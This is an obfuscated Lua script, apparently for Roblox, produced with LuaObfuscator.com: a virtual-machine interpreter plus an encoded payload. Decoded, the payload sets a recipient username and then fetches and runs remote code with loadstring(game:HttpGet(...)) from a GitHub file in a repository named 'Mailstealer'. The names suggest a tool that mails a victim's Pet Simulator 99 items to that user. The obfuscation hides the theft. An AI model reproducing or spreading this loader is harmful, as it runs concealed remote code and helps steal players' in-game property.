--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v82=(v31/((5 -3)^(v32-1)))%((5 -3)^(((v33-((1 -0) -(1637 -(1523 + 114)))) -(v32-((1067 -(68 + 997)) -1))) + (620 -(555 + 64)))) ;return v82-(v82%((2202 -(226 + 1044)) -((3731 -2874) + 74))) ;else local v83=568 -(367 + 201) ;local v84;while true do if (v83==(927 -(214 + 713))) then v84=(1 + 1)^(v32-(1 + 0)) ;return (((v31%(v84 + v84))>=v84) and (878 -(254 + 28 + 595))) or 0 ;end end end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + (120 -(32 + 85)) );v19=v19 + 4 ;return (v37 * (16441815 + 335401)) + (v36 * (14533 + 51003)) + (v35 * 256) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0;local v39;local v40;local v41;local v42;local v43;local v44;local v45;while true do if (v38~=(2 -0)) then else v43=nil;v44=nil;v38=3;end if (v38==1) then local v88=241 -(187 + 54) ;local v89;while true do if (v88~=0) then else v89=0;while true do if (v89==0) then local v101=780 -(162 + 618) ;while true do if (v101==(1 + 0)) then v89=1;break;end if (v101==0) then v41=nil;v42=nil;v101=1 + 0 ;end end end if (v89~=(1 -0)) then else v38=2;break;end end break;end end end if (v38==0) then local v90=0 -0 ;while true do if (v90~=(0 + 0)) then else v39=0;v40=nil;v90=1637 -(1373 + 263) ;end if (v90==1) then v38=1001 -(451 + 549) ;break;end end end if (v38==(1 + 2)) then v45=nil;while true do local v91=0;local v92;while true do if (v91==0) then v92=0;while true do if (v92==1) then if (v39==(0 -0)) then local v105=0 -0 ;local v106;while true do if (v105~=0) then else v106=0;while true do if (v106==1) then v42={};v43={v40,v41,nil,v42};v106=2;end if (v106==2) then v39=1;break;end if (v106==0) then v40={};v41={};v106=1 -0 ;end end break;end end end break;end if (v92==0) then local v102=0;while true do if ((342 -(218 + 123))==v102) then v92=1582 -(1535 + 46) ;break;end if ((0 + 0)~=v102) then else if (v39==1) then local v144=0 + 0 ;local v145;local v146;while true do if (v144==0) then v145=0;v146=nil;v144=1;end if (v144==1) then while true do if (v145==(560 -(306 + 254))) then v146=0;while true do if (v146==(1 + 1)) then v39=2;break;end if (v146==0) then local v161=0 -0 ;while true do if (v161==(1467 -(899 + 568))) then v44=v24();v45={};v161=1 + 0 ;end if (v161~=1) then else v146=1;break;end end end if (v146==1) then local v162=0;while true do if (v162==0) then for v166=2 -1 ,v44 do local v167=0;local v168;local v169;local v170;local v171;local v172;while true do if (v167==0) then v168=0;v169=nil;v167=1;end if (v167==(605 -(268 + 335))) then v172=nil;while true do if (v168==(290 -(60 + 230))) then local v174=572 -(426 + 146) ;while true do if (v174~=(0 + 0)) then else v169=0;v170=nil;v174=1;end if ((1457 -(282 + 1174))==v174) then v168=812 -(569 + 242) ;break;end end end if ((5 -3)==v168) then while true do if (v169~=(0 + 0)) then else v170=1024 -(706 + 318) ;v171=nil;v169=1252 -(721 + 530) ;end if (v169==(1272 -(945 + 326))) then v172=nil;while true do if (v170==0) then local v188=0 -0 ;local v189;while true do if (v188==0) then v189=0 + 0 ;while true do if (v189~=1) then else v170=701 -(271 + 429) ;break;end if (v189~=(0 + 0)) then else local v192=1500 -(1408 + 92) ;local v193;while true do if (v192~=0) then else v193=0;while true do if (v193~=0) then else v171=v22();v172=nil;v193=1;end if (1==v193) then v189=1087 -(461 + 625) ;break;end end break;end end end end break;end end end if (v170~=(1289 -(993 + 295))) then else if (v171==1) then v172=v22()~=(0 + 0) ;elseif (v171==(1173 -(418 + 753))) then v172=v25();elseif (v171~=(2 + 1)) then else v172=v26();end v45[v166]=v172;break;end end break;end end break;end if (v168~=1) then else local v175=0 + 0 ;while true do if (v175==0) then v171=nil;v172=nil;v175=1;end if (v175==(1 + 0)) then v168=1 + 1 ;break;end end end end break;end if (v167==(530 -(406 + 123))) then v170=nil;v171=nil;v167=1771 -(1749 + 20) ;end end end v43[3]=v22();v162=1 + 0 ;end if (v162==(1323 -(1249 + 73))) then v146=1 + 1 ;break;end end end end break;end end break;end end end if ((1147 -(466 + 679))==v39) then local v147=0 -0 ;local v148;while true do if (0~=v147) then else v148=0 -0 ;while true do local v160=1900 -(106 + 1794) ;while true do if (v160~=(0 + 0)) then else if (1~=v148) then else return v43;end if (v148~=(0 + 0)) then else local v163=0 -0 ;local v164;while true do if (v163==0) then v164=0;while true do if (v164~=(2 -1)) then else v148=1;break;end if (v164==(114 -(4 + 110))) then local v173=0;while true do if (1~=v173) then else v164=585 -(57 + 527) ;break;end if (v173~=(1427 -(41 + 1386))) then else for v176=104 -(17 + 86) ,v24() do local v177=0;local v178;while true do if (v177==(0 + 0)) then v178=v22();if (v21(v178,1 -0 ,2 -1 )==(166 -(122 + 44))) then local v181=0 -0 ;local v182;local v183;local v184;local v185;local v186;local v187;while true do if (v181==(0 -0)) then v182=0 + 0 ;v183=nil;v181=1;end if (2~=v181) then else v186=nil;v187=nil;v181=3;end if (v181==(1 + 0)) then v184=nil;v185=nil;v181=2;end if (v181==(5 -2)) then while true do if (1==v182) then local v191=0;while true do if (v191==(65 -(30 + 35))) then v185=nil;v186=nil;v191=1 + 0 ;end if (v191==1) then v182=1259 -(1043 + 214) ;break;end end end if (v182==0) then v183=0 -0 ;v184=nil;v182=1213 -(323 + 889) ;end if ((5 -3)==v182) then v187=nil;while true do if ((582 -(361 + 219))~=v183) then else while true do if (v184~=(323 -(53 + 267))) then else if (v21(v186,3,3)==(1 + 0)) then v187[4]=v45[v187[4]];end v40[v176]=v187;break;end if (v184~=2) then else local v196=0;local v197;while true do if (v196~=0) then else v197=0;while true do if (v197==1) then v184=3;break;end if (v197==(413 -(15 + 398))) then local v206=0;local v207;while true do if ((982 -(18 + 964))==v206) then v207=0;while true do if (v207~=0) then else local v213=0 -0 ;while true do if (v213~=0) then else if (v21(v186,1 + 0 ,1)~=(1 + 0)) then else v187[2]=v45[v187[2]];end if (v21(v186,852 -(20 + 830) ,2)==(1 + 0)) then v187[129 -(116 + 10) ]=v45[v187[1 + 2 ]];end v213=1;end if (v213==(739 -(542 + 196))) then v207=1;break;end end end if (v207==1) then v197=1;break;end end break;end end end end break;end end end if (v184~=0) then else local v198=0 -0 ;local v199;local v200;while true do if (v198==1) then while true do if (v199~=0) then else v200=0;while true do if (v200~=(0 + 0)) then else local v208=0 + 0 ;while true do if (v208==(1 + 0)) then v200=1;break;end if (v208==(0 -0)) then v185=v21(v178,4 -2 ,1554 -(1126 + 425) );v186=v21(v178,4,411 -(118 + 287) );v208=1;end end end if (v200==(3 -2)) then v184=1122 -(118 + 1003) ;break;end end break;end end break;end if (v198==0) then v199=0;v200=nil;v198=1;end end end if (v184==(2 -1)) then local v201=0;local v202;local v203;while true do if (v201~=(378 -(142 + 235))) then else while true do if (v202==0) then v203=0 -0 ;while true do if (v203==(0 + 0)) then v187={v23(),v23(),nil,nil};if (v185==0) then local v209=0;local v210;local v211;local v212;while true do if (v209==0) then v210=0;v211=nil;v209=1 -0 ;end if (v209~=1) then else v212=nil;while true do if (v210~=1) then else while true do if (v211==0) then v212=0;while true do if (v212==0) then v187[3]=v23();v187[4]=v23();break;end end break;end end break;end if (v210==(0 + 0)) then local v220=0 + 0 ;while true do if (v220==1) then v210=1 + 0 ;break;end if (v220==(0 + 0)) then v211=0;v212=nil;v220=1 + 0 ;end end end end break;end end elseif (v185==(2 -1)) then v187[7 -4 ]=v24();elseif (v185==2) then v187[6 -3 ]=v24() -(2^16) ;elseif (v185==(1 + 2)) then local v221=0 -0 ;local v222;local v223;while true do if ((754 -(239 + 514))==v221) then while true do if (v222~=0) then else v223=0 + 0 ;while true do if (v223==(1329 -(797 + 532))) then v187[3]=v24() -(2^16) ;v187[3 + 1 ]=v23();break;end end break;end end break;end if (v221~=0) then else v222=0 + 0 ;v223=nil;v221=2 -1 ;end end end v203=1203 -(373 + 829) ;end if (v203==1) then v184=2;break;end end break;end end break;end if (v201==(731 -(476 + 255))) then v202=0;v203=nil;v201=1;end end end end break;end if ((1130 -(369 + 761))==v183) then local v194=0;while true do if ((0 + 0)==v194) then v184=0 -0 ;v185=nil;v194=1 -0 ;end if (v194==(239 -(64 + 174))) then v183=1 + 0 ;break;end end end if ((1 -0)~=v183) then else v186=nil;v187=nil;v183=2;end end break;end end break;end end end break;end end end for v179=337 -(144 + 192) ,v24() do v41[v179-1 ]=v29();end v173=1;end end end end break;end end end break;end end end break;end end end v102=1;end end end end break;end end end break;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v46=0;local v47;local v48;local v49;local v50;local v51;local v52;while true do if (v46==(217 -(42 + 174))) then v49=1 + 0 ;v50=(v21(v48,1 + 0 + 0 ,9 + 11 ) * ((1506 -(363 + 1141))^(1612 -(1183 + 397)))) + v47 ;v46=5 -3 ;end if (v46==(3 + 0)) then if (v51==(0 + 0)) then if (v50==(1975 -(1913 + 62))) then return v52 * (0 + 0) ;else local v100=0 -0 ;while true do if (v100==0) then v51=(3547 -(1565 + 48)) -(565 + 1368) ;v49=0 -0 ;break;end end end elseif (v51==2047) then return ((v50==(1661 -(1477 + 184))) and (v52 * ((1 -0)/(0 + 0)))) or (v52 * NaN) ;end return v8(v52,v51-(1879 -(564 + 181 + 111)) ) * (v49 + (v50/((2 -0)^(156 -104)))) ;end if (v46==(306 -(244 + 60))) then v51=v21(v48,21,24 + (1145 -(782 + 356)) );v52=((v21(v48,508 -(41 + 435) )==1) and  -1) or (268 -(176 + 91)) ;v46=1004 -((2443 -1505) + 63) ;end if (v46==((0 -0) + 0)) then v47=v24();v48=v24();v46=1126 -(936 + 189) ;end end end v26=nil;function v26(v53)local v54;if  not v53 then v53=v24();if (v53==(1092 -(975 + 117))) then return "";end end v54=v3(v16,v19,(v19 + v53) -(1876 -(157 + 1718)) );v19=v19 + v53 ;local v55={};for v66=1 + 0 , #v54 do v55[v66]=v2(v1(v3(v54,v66,v66)));end return v6(v55);end v18=5;end if (v18==2) then function v22()local v56=v1(v16,v19,v19);v19=v19 + 1 ;return v56;end v23=nil;function v23()local v57,v58=v1(v16,v19,v19 + (6 -4) );v19=v19 + (6 -4) ;return (v58 * 256) + v57 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v59)if (v1(v59,2)==79) then v20=v0(v3(v59,1,1));return "";else local v85=v2(v0(v59,16));if v20 then local v93=v5(v85,v20);v20=nil;return v93;else return v85;end end end);v18=1;end if (v18==7) then function v30(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v68=v63;local v69=v64;local v70=v65;local v71=v28;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v86=0,v76 do if (v86>=v70) then v74[v86-v70 ]=v75[v86 + 1 ];else v78[v86]=v75[v86 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do local v87=0;while true do if (v87==1) then if (v81<=5) then if (v81<=2) then if (v81<=0) then v78[v80[2]]();elseif (v81>1) then local v107=v80[2];local v108,v109=v71(v78[v107](v13(v78,v107 + 1 ,v80[3])));v73=(v109 + v107) -1 ;local v110=0;for v138=v107,v73 do v110=v110 + 1 ;v78[v138]=v108[v110];end else local v111=v80[2];v78[v111]=v78[v111](v13(v78,v111 + 1 ,v73));end elseif (v81<=3) then v62[v80[3]]=v78[v80[2]];elseif (v81>4) then v78[v80[2]]=v80[3]~=0 ;else local v114=0;local v115;local v116;while true do if (v114==1) then v78[v115 + 1 ]=v116;v78[v115]=v116[v80[4]];break;end if (v114==0) then v115=v80[2];v116=v78[v80[3]];v114=1;end end end elseif (v81<=8) then if (v81<=6) then if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v62;else v78[v80[2]]=v62[v80[3]];end elseif (v81>7) then v72=v80[3];else v78[v80[2]]=v80[3];end elseif (v81<=9) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81>10) then local v124;local v125,v126;local v127;local v128;v62[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v62;else v78[v80[2]]=v62[v80[3]];end v72=v72 + 1 ;v80=v68[v72];if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v62;else v78[v80[2]]=v62[v80[3]];end v72=v72 + 1 ;v80=v68[v72];v128=v80[2];v127=v78[v80[3]];v78[v128 + 1 ]=v127;v78[v128]=v127[v80[4]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3]~=0 ;v72=v72 + 1 ;v80=v68[v72];v128=v80[2];v125,v126=v71(v78[v128](v13(v78,v128 + 1 ,v80[3])));v73=(v126 + v128) -1 ;v124=0;for v141=v128,v73 do v124=v124 + 1 ;v78[v141]=v125[v124];end v72=v72 + 1 ;v80=v68[v72];v128=v80[2];v78[v128]=v78[v128](v13(v78,v128 + 1 ,v73));v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]();v72=v72 + 1 ;v80=v68[v72];v72=v80[3];else do return;end end v72=v72 + 1 ;break;end if (v87==0) then v80=v68[v72];v81=v80[1];v87=1;end end end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!073O00028O0003043O0075736572030C3O00746F6E6461322O30376C6F6C030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403453O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F6D2O61726C2O6F77312F4D61696C737465616C65722F6D61696E2F70732O392E74787400103O0012073O00013O0026093O0001000100010004083O00010001001207000100033O00120B000100023O00122O000100043O00122O000200053O00202O00020002000600122O000400076O000500016O000200056O00013O00024O00010001000100044O000F00010004083O000100012O000A3O00017O00",v9(),...);